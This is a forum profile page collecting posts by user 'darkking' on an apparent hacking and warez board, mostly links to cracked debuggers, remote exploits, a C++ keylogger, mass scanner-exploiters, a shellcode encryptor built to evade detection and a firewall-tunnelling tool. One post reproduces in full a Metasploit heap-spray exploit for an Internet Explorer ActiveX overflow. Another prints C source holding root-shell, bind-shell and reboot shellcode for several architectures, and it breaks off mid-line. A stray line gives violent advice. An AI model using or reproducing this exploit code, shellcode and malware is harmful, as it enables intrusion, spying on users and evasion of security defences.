Everything posted by darkking

  1. darkking

    VB or C++

    For a start, flowcharts are OK; seriously speaking, I recommend C++ or Delphi.
  2. I tested it myself and it worked for me (win xp home all updates to date), but I still haven't received the messenger password by e-mail. Edit: it doesn't send the pass, but it infects win :
  3. Compuware Driver Studio v3.2 (XP SP2 Updated)

    The Compuware DevPartner product line delivers superior value to application development and testing teams, complementing and enhancing Microsoft Visual Studio capabilities as well as Java. With solutions that help developers debug, analyze, test and tune applications, Compuware DevPartner offers award-winning technology that is a long-time friend of development shops.

    http://www.4shared.com/file/3828268/12222782/ds32b2485part1.html
    http://www.4shared.com/file/3829418/e152aa92/ds32b2485part2.html
    http://www.4shared.com/file/3830363/7ce69562/ds32b2485part3.html
    http://www.4shared.com/file/3840651/d2eb976/ds32b2485part4.html

    IDA Pro v5.0.0.879 Advanced

    IDA Pro is a Windows or Linux hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all. Just grab an evaluation version if you want a test drive. An executive summary is provided for the non-technical user.

    http://www.4shared.com/file/3787130/804d5f8e/ipart1.html
    http://www.4shared.com/file/3787781/1033ca61/ipart2.html

    Numega Smartcheck v6.03

    NuMega BoundsChecker 6.2 and NuMega SmartCheck 6.2. Designed to accelerate the development of reliable Windows applications and components, BoundsChecker and SmartCheck are the industry's premier error detection and debugging tools. These new versions include enhancements designed to increase developer productivity and detect errors in applications developed for Windows 2000, Windows NT, Windows 98/95 and Windows CE.

    http://www.4shared.com/file/3777432/ead86b98/smartcheck_v603.html

    hiew v7.10

    http://www.4shared.com/file/3797139/c4f1ce9a/hiew_710_full.html

    Ollydbg v1.10 (Most Plugines & Scripts)

    http://www.4shared.com/file/3813237/6f4b3387/odbg110_diablo.html

    WinHex 13.3

    http://www.4shared.com/file/3788279/c7d88c21/wh133.html
  4. streamripper <= 1.61.25 win32 remote exploit

    http://rapidshare.de/files/34872045/streamripper.txt
    MD5: 2141F8CABA389A2B74C960AD8076C74B
  5. Microsoft Msjet40.dll Exploit For Asp

    http://rapidshare.de/files/34871873/msjet40.dll_exploit.txt
    MD5: 81353E47A94E2E41B468E8C532E06673
  6. Download: http://www.megaupload.com/?d=U6IHBPL2

    Password: profile
  7. darkking

    flyppy

    welcome, and good luck with learning and with "doing something around here"
  8. Vulnerable: Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 require 'msf/core' module Msf class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', 'Description' => %q{ This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 3783 $', 'References' => [ [ 'OSVDB', '27110' ], [ 'BID', '19030' ], [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "x00", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] ], 'DefaultTarget' => 0)) end def autofilter false end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] # Randomize the javascript variable names var_buffer = Rex::Text.rand_text_alpha(rand(30)+2) var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) var_x = Rex::Text.rand_text_alpha(rand(30)+2) var_i = Rex::Text.rand_text_alpha(rand(30)+2) var_tic = Rex::Text.rand_text_alpha(rand(30)+2) var_toc = Rex::Text.rand_text_alpha(rand(30)+2) # Randomize HTML data html = Rex::Text.rand_text_alpha(rand(30)+2) # Build out the message content = %Q| <html> <head> <script> try { var #{var_unescape} = unescape ; var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ; var #{var_buffer} = 
#{var_unescape}( "%u#{addr_word}" ) ; while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ; var #{var_x} = new Array() ; for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) { #{var_x}[ #{var_i} ] = #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; } for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) { var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { } var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); } } catch( e ) { window.location = 'about:blank' ; } </script> </head> <body> #{html} </body> </html> | # Randomize the whitespace in the document content.gsub!(/s+/) do |s| len = rand(100)+2 set = "x09x20x0dx0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, content) end end end
  9. darkking

    C++ Keylogger

    Keylogger in C++

    Credits: XoreDevelopmentStudios
    Download: http://rapidshare.de/files/34741398/keylogger.rar
    MD5: 7878D285443DDBD4AABE007B04FE03E3
  10. The new Nmap GUI will be a graphical frontend for the nmap network scanner. New users will prefer it for its ease of use. Experienced users will prefer it for its ability to organize results and store them for later analysis.

    http://kent.dl.sourceforge.net/sourceforge/nmapgui/nmapgui-1.0.1-everthing_you_need.win.zip
    Size: 3.9 MB (include nmap)
  11. LOL.... that's a good one, Fatality's line; I was really lost in thought
  12. XML Rpc scanner and exploiter

    This software is a powerful tool allowing you to scan hosts with XML-RPC vulnerability. You can choose passthru() or system() method.

    Scanner: http://rapidshare.de/files/34152723/xml-rpc-scan-2006-2.zip
    MD5: 5DAFB2B9086283F3D300F091937C3FAB

    Exploiter: http://rapidshare.de/files/34152766/xml-rpc-exploit-2006-2.zip
    MD5: 1B821A2E781A2540236946DBCD08F883
  13. IIS-5 DAV Scanner and Exploiter for Windows 98/ME/NT/2000/XP

    Notes of Version 2006.2 by mescalin

    Introduction

    This software is a powerful tool allowing you to exploit, manage and control archive files in hosts with IIS-5 DAV vulnerability. Usually have a list of hosts ".txt" extension. ZIP and other formats are not supported.

    http://rapidshare.de/files/34147875/iis5dav-scan-exploit-2006-2.zip
    MD5: 57EED3FB5BB3CDB06B82A53F0037969D
  14. PHP Injection Scanner / Exploiter for Windows 98/ME/NT/2000/XP

    Notes of Version 2006.2 by mescalin

    Introduction

    This software is a powerful tool allowing you to scan hosts with any PHP vulnerability. Usually have a list of hosts ".txt" extension. ZIP and other formats are not supported.

    Features

    * Highly sophisticated codes
    * More faster and simple
    * Many strings in database
    * Authenticity verification
    * Ability to recover physically damaged archives
    * Filter in url hosts (ex: http://www.site.com.br/subdir1/subdir2/) will be use ( www.site.com.br/ and /subdir1/subdir2/ )

    http://rapidshare.de/files/34003722/phpinjection-scan-exploit-2006-2.zip
    MD5: 328CF5A53DF01E5CB26936C9622889FC
  15. break his 'mug' or hit him in the liver until he can't take any more.
  16. Download: http://rapidshare.de/files/27083222/iepsb.rar
    Passwd: warez-over.net

    vb 3.6 skins
    http://rapidshare.de/files/30676060/All_Extremepixels_Vb_3.6.rar.html
  17. edit: violent language. I was plastered.
  18. TAPiON engine was developed to avoid code detection (shellcode/whatever). The engine can create unique deciphering algorithm, encrypt the original data and decrypt it on the fly (while code executes).

    Features:

    * Decryption key based on randomly generated deciphering algorithm (attacker breakpoint insertion will cause invalid decryption)
    * Decryption based on CPU time (selected randomly) - anti emulator code
    * RDTSC / coprocessor instructions usage - anti emulator code
    * Random step of block xoring
    * Random step of key increasing
    * Random registers usage
    * Multiple instructions variants
    * Block swapping
    * Garbage engine (normal instructions / coprocessor instructions)
    * Block swapping
    * Random deciphering algorithm size
    * Multiple deciphering algorithm layers generation

    http://rapidshare.de/files/33658085/tapion_pack01b.zip
    MD5: 1B24806D8325B543BB3474E0E32FC609
  19. * Kurdish Security Advisory
    * Author : Botan
    * Script : Artmedic Links
    * Site : http://www.artmedic.de
    * Version : 5.0
    * Risk : High
    * Class : Remote

    Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-27-artmedic-links.html

    Dork: "artmedic links 5.0"

    Exploit: http://rapidshare.de/files/33657269/vulnerability_artmedic.pl
    MD5: 24A8FE8E1505D0E5274FC9B206042A61
  20. ASP auditor v2 BETA

    Author david.kierznowski_at_gmail.com
    http://michaeldaw.org

    purpose: Look for common misconfigurations and information leaks in ASP.NET applications.

    This tool is based on H D Moore’s Dot Net Application Scanner
    Author: H D Moore
    URL: http://www.digitaloffense.net/index.html?section=TOOLS

    HDM thanks for the feedback.

    Changelog:

    * Combined code from Asp Auditor v1 BETA and HDM’s DNAScanner.
    * Version plugin allowing specific ASP.NET versioning.
    * Version brute force capabilities using JavaScript validate directories.
    * Check if global ASP.NET validate is being used.
    * Added brute force as option in usage()

    -usage

    $ ./asp-audit-latest.pl
    Usage: ./asp-audit-latest.pl [http://target/app/file.aspx] (opts)
    (opts)
    -bf brute force ASP.NET version using JS Validate directories.

    –example 1

    $ ./asp-audit.pl http://www.*hidden*/index.aspx
    [*] Sending initial probe request…
    [*] Sending path discovery request…
    [*] Sending ASP.NET validate discovery request…
    [*] Sending application trace request…
    [*] Sending null remoter service request…
    [ .NET Configuration Analysis ]
    Server -> Microsoft-IIS/6.0
    Application -> /
    FilePath -> D:VirtualServers*hidden*
    ADNVersion -> 1.1.4322.2300
    matches -> 1.1.4322.2300 Version 1.1 Post-SP1 (Windows Server 2003 SP1) Mar 2005

    –example 2

    $ ./asp-audit.pl http://www.*hidden*/index.aspx -bf
    [*] Sending initial probe request…
    [*] Sending path discovery request…
    [*] Sending ASP.NET validate discovery request…
    [*] Sending application trace request…
    [*] Sending null remoter service request…
    [ .NET Configuration Analysis ]
    Server -> Microsoft-IIS/6.0
    AppTrace -> LocalOnly
    Application -> /
    FilePath -> D:inetpub*hidden*
    ADNVersion -> 1.1.4322.2300
    matches -> 1.1.4322.2300 Version 1.1 Post-SP1 (Windows Server 2003 SP1) Mar 2005
    [*] Sending brute force discovery requests…
    Found -> /aspnet_client/system_web/1_1_4322

    http://michaeldaw.org/projects/asp-audit-latest.tar.gz
  21. http://rapidshare.de/files/33560823/ie_com.txt
    MD5: 21887D28458A1BC37F3916492ED36AA0
  22. Tool for Linux , (*nix) .. it support pcc , sparc , mips , x86 procs , this tool injects shellcodes into linux environment and uses these shellcodes for exploit developing , maybe IDS detections or testing and other stuff .... [ SIGINT , SIGHUP , SIGABRT handlers added ] /* * Qnix <Qnix@bsdmail.org> * ENVT v0.01 * * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define VERSION "v0.1" #define MAX_SIZE 1024 #define SHSIZE 512 #define bash "/bin/bash" /* Prototype */ void getenvaddr(char *environment); void help(char *string); void setshenv(int shellcode); /****************** START OF SHELLCODES ******************/ char execve_binbash[] = "x31xc0" // xor %eax, %eax "x50" // push %eax "x68x2fx2fx73x68" // push $0x68732f2f "x68x2fx62x69x6e" // push $0x6e69622f "x89xe3" // mov %esp, %ebx "x50" // push %eax "x53" // push %ebx "x89xe1" // mov %esp, %ecx "x31xd2" // xor %edx, %edx "xb0x0b" // mov $0xb, %al "xcdx80"; // int $0x80 char execve_setuid_setgid_bb[] = "x6ax17" // push $0x17 "x58" // pop %eax "x31xdb" // xor %ebx, %ebx "xcdx80" // int $0x80 "x6ax2e" // push $0x2e "x58" // pop %eax "x53" // push %ebx "xcdx80" // int $0x80 "x31xd2" // xor %edx, %edx "x6ax0b" // push $0xb "x58" // pop %eax "x52" // push %edx "x68x2fx2fx73x68" // push $0x68732f2f "x68x2fx62x69x6e" // push $0x6e69622f "x89xe3" // mov %esp, %ebx "x52" // push %edx "x53" // push %ebx "x89xe1" // mov %esp, %ecx "xcdx80"; // int $0x80 char portbind_64713[] = /* socket(AF_INET, SOCK_STREAM, 0) */ "x6ax66" // push $0x66 "x58" // pop %eax "x6ax01" // push $0x1 "x5b" // pop %ebx "x99" // cltd "x52" // push %edx "x53" // push %ebx "x6ax02" // push $0x2 "x89xe1" // mov %esp,%ecx "xcdx80" // int $0x80 /* bind(s, server, sizeof(server)) */ "x52" // push %edx "x66x68xfcxc9" // pushw $0xc9fc // PORT = 64713 "x66x6ax02" // pushw $0x2 "x89xe1" // mov $esp,%ecx "x6ax10" // push $0x10 "x51" // push %ecx "x50" // push %eax "x89xe1" // mov %esp,%ecx "x89xc6" // mov %eax,%esi "x43" 
// inc %ebx "xb0x66" // mov $0x66,%al "xcdx80" // int $0x80 /* listen(s, anything) */ "xb0x66" // mov $0x66,%al "xd1xe3" // shl %ebx "xcdx80" // int $0x80 /* accept(s, 0, 0) */ "x52" // push %edx "x56" // push %esi "x89xe1" // mov %esp,%ecx "x43" // inc %ebx "xb0x66" // mov $0x66,%al "xcdx80" // int $0x80 "x93" // xchg %eax,%ebx /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ "x6ax02" // push $0x2 "x59" // pop %ecx "xb0x3f" // mov $0x3f,%al "xcdx80" // int $0x80 "x49" // dec %ecx "x79xf9" // jns dup_loop /* execve("/bin/sh", ["/bin/sh"], NULL) */ "x6ax0b" // push $0xb "x58" // pop %eax "x52" // push %edx "x68x2fx2fx73x68" // push $0x68732f2f "x68x2fx62x69x6e" // push $0x6e69622f "x89xe3" // mov %esp, %ebx "x52" // push %edx "x53" // push %ebx "x89xe1" // mov %esp, %ecx "xcdx80"; // int $0x80 char reboot_20[] = "x6ax58" // push $0x58 "x58" // pop %eax "xbbxadxdexe1xfe" // mov $0xfee1dead,%ebx "xb9x69x19x12x28" // mov $0x28121969,%ecx "xbax67x45x23x01" // mov $0x1234567,%edx "xcdx80"; // int $0x80 char sparc_portbind[]= "x9dxe3xbfx78" // save %sp, -136, %sp "x90x10x20x02" // mov 2, %o0 "x92x10x20x01" // mov 1, %o1 "x94x22x80x0a" // sub %o2, %o2, %o2 "xd0x23xa0x44" // st %o0, [ %sp + 0x44 ] "xd2x23xa0x48" // st %o1, [ %sp + 0x48 ] "xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ] "x90x10x20x01" // mov 1, %o0 "x92x03xa0x44" // add %sp, 0x44, %o1 "x82x10x20xce" // mov 0xce, %g1 "x91xd0x20x10" // ta 0x10 "xd0x27xbfxf4" // st %o0, [ %fp + -12 ] "x90x10x20x02" // mov 2, %o0 "xd0x37xbfxd8" // sth %o0, [ %fp + -40 ] "x13x08xc8xc8" // sethi %hi(0x23232000), %o1 "x90x12x63x0f" // or %o1, 0x30f, %o0 "xd0x37xbfxda" // sth %o0, [ %fp + -38 ] "xc0x27xbfxdc" // clr [ %fp + -36 ] "x92x07xbfxd8" // add %fp, -40, %o1 "xd0x07xbfxf4" // ld [ %fp + -12 ], %o0 "x94x10x20x10" // mov 0x10, %o2 "xd0x23xa0x44" // st %o0, [ %sp + 0x44 ] "xd2x23xa0x48" // st %o1, [ %sp + 0x48 ] "xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ] "x90x10x20x02" // mov 2, %o0 "x92x03xa0x44" // add %sp, 0x44, %o1 "x82x10x20xce" // mov 
0xce, %g1 "x91xd0x20x10" // ta 0x10 "xd0x07xbfxf4" // ld [ %fp + -12 ], %o0 "x92x10x20x05" // mov 5, %o1 "xd0x23xa0x44" // st %o0, [ %sp + 0x44 ] "xd2x23xa0x48" // st %o1, [ %sp + 0x48 ] "x90x10x20x04" // mov 4, %o0 "x92x03xa0x44" // add %sp, 0x44, %o1 "x82x10x20xce" // mov 0xce, %g1 "x91xd0x20x10" // ta 0x10 "x92x07xbfxd8" // add %fp, -40, %o1 "x94x07xbfxec" // add %fp, -20, %o2 "xd0x07xbfxf4" // ld [ %fp + -12 ], %o0 "xd0x23xa0x44" // st %o0, [ %sp + 0x44 ] "xd2x23xa0x48" // st %o1, [ %sp + 0x48 ] "xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ] "x90x10x20x05" // mov 5, %o0 "x92x03xa0x44" // add %sp, 0x44, %o1 "x82x10x20xce" // mov 0xce, %g1 "x91xd0x20x10" // ta 0x10 "xd0x27xbfxf0" // st %o0, [ %fp + -16 ] "xd0x07xbfxf0" // ld [ %fp + -16 ], %o0 "x92x22x40x09" // sub %o1, %o1, %o1 "x82x10x20x5a" // mov 0x5a, %g1 "x91xd0x20x10" // ta 0x10 "xd0x07xbfxf0" // ld [ %fp + -16 ], %o0 "x92x10x20x01" // mov 1, %o1 "x82x10x20x5a" // mov 0x5a, %g1 "x91xd0x20x10" // ta 0x10 "xd0x07xbfxf0" // ld [ %fp + -16 ], %o0 "x92x10x20x02" // mov 2, %o1 "x82x10x20x5a" // mov 0x5a, %g1 "x91xd0x20x10" // ta 0x10 "x2dx0bxd8x9a" // sethi %hi(0x2f626800), %l6 "xacx15xa1x6e" // or %l6, 0x16e, %l6 "x2fx0bxdcxda" // sethi %hi(0x2f736800), %l7 "x90x0bx80x0e" // and %sp, %sp, %o0 "x92x03xa0x08" // add %sp, 8, %o1 "x94x22x80x0a" // sub %o2, %o2, %o2 "x9cx03xa0x10" // add %sp, 0x10, %sp "xecx3bxbfxf0" // std %l6, [ %sp + -16 ] "xd0x23xbfxf8" // st %o0, [ %sp + -8 ] "xc0x23xbfxfc" // clr [ %sp + -4 ] "x82x10x20x3b" // mov 0x3b, %g1 "x91xd0x20x10"; // ta 0x10 char mips_sh[] = /* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */ "xffxffx10x04xabx0fx02x24" "x55xf0x46x20x66x06xffx23" "xc2xf9xecx23x66x06xbdx23" "x9axf9xacxafx9exf9xa6xaf" "x9axf9xbdx23x21x20x80x01" "x21x28xa0x03xccxcdx44x03" "/bin/sh"; char ppc_sh[] = "x7cx3fx0bx78" /*mr r31,r1*/ "x7cxa5x2ax79" /*xor. 
r5,r5,r5*/ "x42x40xffxf9" /*bdzl+ 10000454<main>*/ "x7fx08x02xa6" /*mflr r24*/ "x3bx18x01x34" /*addi r24,r24,308*/ "x98xb8xfexfb" /*stb r5,-261(r24)*/ "x38x78xfexf4" /*addi r3,r24,-268*/ "x90x61xffxf8" /*stw r3,-8(r1)*/ "x38x81xffxf8" /*addi r4,r1,-8*/ "x90xa1xffxfc" /*stw r5,-4(r1)*/ "x3bxc0x01x60" /*li r30,352*/ "x7fxc0x2ex70" /*srawi r0,r30,5*/ "x44xdexadxf2" /*.long 0x44deadf2*/ "/bin/shZ"; // the last byte becomes NULL /****************** END OF SHELLCODES ******************/ int main(int argc, char *argv[]) { int c; char buf1[MAX_SIZE]; char *addr = getenv("ENVT"); int buf1i; extern char *optarg; extern int optind, optopt; if(addr != NULL) { getenvaddr(addr); exit(0); } if(argc < 2) { help(argv[0]); } while((c = getopt(argc, argv, ":s:lhv")) != -1) { switch© { case 'v': version(); break; case 'h': help(argv[0]); case 'l': shellcode_list(); break; case 's': strncpy(buf1,optarg,MAX_SIZE-1); buf1i = atoi(buf1); setshenv(buf1i); break; case ':': fprintf(stderr,"Option -%c requires an operandn",optopt); break; } } return(0); } /* * Display version . * * */ int version() { fprintf(stdout,"ENVT %sn",VERSION); fprintf(stdout,"Coded by Qnix <Qnix@bsdmail.org>n"); exit(0); } /* * Display help . * * */ void getenvaddr(char *environment) { fprintf(stdout,"SHELLCODE FOUND IN %pn",environment); } void help(char *string) { fprintf(stderr,"Usage : %sn-l:(shellcode-list)n-s:<shellcode-number>n-h:(help)n-v:(version)n",string); exit(0); } /* * Display shellcode list . 
* * */ int shellcode_list() { fprintf(stdout,"nttt::[ LINUX/x86 ]::n"); fprintf(stdout,"1) linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn"); fprintf(stdout,"2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytesn"); fprintf(stdout,"3) linux/x86 portbind (port 64713) 86 bytesn"); fprintf(stdout,"4) linux/x86 reboot() - 20 bytesnn"); fprintf(stdout,"ttt::[ LINUX/SPARC ]::n"); fprintf(stdout,"5) linux/SPARC portbind port 8975 284 bytesnn"); fprintf(stdout,"ttt::[ LINUX/MIPS ]::n"); fprintf(stdout,"6) linux/mips execve /bin/sh 56 bytesnn"); fprintf(stdout,"ttt::[ LINUX/PPC ]::n"); fprintf(stdout,"7) linux/ppc execve /bin/sh 60 bytesnn"); exit(0); } /* * Set Shellcode in environment . * * */ void setshenv(int shellcode) { char *addr = getenv("ENVT"); // Use to get shellcode addr char execvebb[sHSIZE]; // Use for shellcode(1) char setugbb[sHSIZE]; // Use for shellcode(2) char portbind[sHSIZE]; // Use for shellcode(3) char reboot[sHSIZE]; // Use for shellcode(4) char sparc1[sHSIZE]; // Use for shellcode(5) char mips1[sHSIZE]; // Use for shellcode(6) char ppc1[sHSIZE]; // Use for shellcode(7) if(shellcode >= 8) { fprintf(stderr,"Error : shellcode number %d unavailable type -l to viewnthe available shellcodes.n",shellcode); exit(0); } /* Shellcode number 1 */ if(shellcode == 1) { fprintf(stdout,"Shellcode: Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn"); fprintf(stdout,"[+]t Setting memory for the shellcode .n"); memset(execvebb,0x90,SHSIZE); fprintf(stdout,"[+]t Copying shellcode to memory .n"); memcpy(&execvebb[sHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash)); memcpy(execvebb,"ENVT=",5); fprintf(stdout,"[+]t Putting shellcode in the environment .n"); putenv(execvebb); fprintf(stdout,"[+]t Going into the environment (ENVT) and exiting ....nDone %d bytes loaded to (ENVT)n",strlen(execve_binbash)); execl(bash, bash, '
  23. darkking

    Hi!

    hi and welcome
  24. Firepass - is a tunneling tool, allowing to bypass firewall restrictions and encapsulate data flows inside legal ones to use HTTP POST requests. TCP or UDP based protocols may be tunneled with Firepass. For now, both - client and server parts are written in Perl and the server script acts as a CGI program. The Firepass key feature is that you may use several type of installation of the server part script in the external network. You do not need to bind any port on the external box. Firepass may also be usable for the reverse task, when the server script is located at the corporative web server and when client interact with it from the external network.

    Download | md5sum: 6e533e57ea5b4fc02dc0f6e851840bbd
    http://gray-world.net/projects/firepass/firepass-1.1.2a.tar.gz
  25. You made a good choice, especially since it's about your future. What I can tell you is to wish you success in life and in whatever you want to do, and, as 0x90 also said, it's not worth the risk.